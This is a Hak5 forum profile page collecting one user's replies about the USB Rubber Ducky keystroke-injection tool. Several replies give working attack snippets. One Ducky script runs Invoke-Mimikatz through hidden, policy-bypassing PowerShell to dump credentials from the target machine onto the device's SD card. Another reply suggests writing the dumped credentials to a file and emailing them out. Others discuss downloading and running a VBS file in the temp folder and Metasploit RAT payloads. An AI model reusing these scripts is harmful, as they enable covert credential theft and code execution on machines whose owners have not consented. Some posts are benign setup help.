Jump to content
Hak5 Forums


Active Members
  • Content count

  • Joined

  • Last visited

About ThoughtfulDev

  • Rank
    Hak5 Fan +

Contact Methods

  • Website URL

Profile Information

  • Gender
    Not Telling

Recent Profile Visitors

329 profile views
  1. Installing drivers on target machines issue

    Nope no solution except what you already said: Delay
  2. I dont get this

    try encoding in your keyboard layout (default is US)
  3. Download a file WITHOUT powershell

    You can run powershell and cmd without admin privs or am i mistaken? e.g ctrl +r and then powershell/cmd.exe will run the it without admin privs.
  4. VPN

    I'm using PIA but have a look at That One Privacy Site. That dude is just awesome!
  5. Help with Output

    Are you sure that php is enabled in your apache or IIS webserver? try to place a php file e.g test.php in the webdirectory root with the following content: <?php phpinfo(); ?> if you now visit yourwebserver/test.php you should see a table with some information if php is enabled. I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz REM ------------------------------------------------------------------------------------- REM Get drive letter of drive with label DUCKY REM ------------------------------------------------------------------------------------- STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d ENTER DELAY 500 REM ------------------------------------------------------------------------------------- REM Copy and execute Invoke Mimikatz REM ------------------------------------------------------------------------------------- STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';" Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.
  6. Best Firmware for Ducky Rubber?

    The c_duck_v2.1.hex is the standart TwinDuck Firmware which mounts your Ducky as a HID Keyboard and USB Storage Device. The payload starts as soon as you plug it in. This is probably want you want to use.
  7. HOW play .exe or another file inside DUCKY

    Flash the TwinDuck Firmware, which allows the ducky to be seen as a USB Storage Device and a HID Keyboard. The call your SDCard 'DUCKY' and use this script: for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d %duck& stores the drive letter of your ducky :)
  8. A question about scripting

    Use something like: Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt'; this writes the output of Invoke-Mimikatz to your temp folder in a file name yourpcname_creds.txt which you can then read and or even send as a email attachment if you want. ps: the invoke mimikatz script isn't hosted on darrens webserver - use your own host.
  9. About the 15 seconds password hack

    As far as i know it should show any output since it only writes a file in the current folder (e.g /var/www/html or sth).
  10. New To Ducky And Have Some Questions.

    It should work as long as there are corresponding hotkeys to do the things you want :)
  11. Accidentially deleted the inject.bin file :(

    FAT32. and no only the inject.bin since this was just the hello world payload. as already said use the java encoder to encode your raw txt payload into the inject.bin
  12. Running from Windows 10

    I use this one to find a drive labeled ducky(works in win 10/8/7) for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d %duck% contains your ducky drive letter.
  13. [Release] duckyRAT: Rubber Ducky RAT

    Sounds like you need a Basic Metasploit payload (dont worry about the stealth /undetected part for now). Have a look at Metasploit Minute for Tutorials about Metasploit.
  14. I know the DownloadFile command runs just fine (remove everything after the ;). The file should then be in your temp folder (named update.vbs). The error is the line after the ';'. This line tries to run the update.vbs located in the temp folder but if you want to run a.exe in powershell you cant just type a.exe you have to use ./a.exe (you understand my point?)
  15. Can I get my Rubber Ducky to do this?

    What you are describing is the Twinduck firmware (have a look at the wiki). It will mount your Ducky as a USB Drive and as a HID. So it will execute keystrokes while being mounted as a USB Drive. You can of course write the output ofthe ipconfig command to your usb drive. will look something like (in cmd): for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do ipconfig > %a/ip.txt Note that your sdcard must be labeled DUCKY for this to work.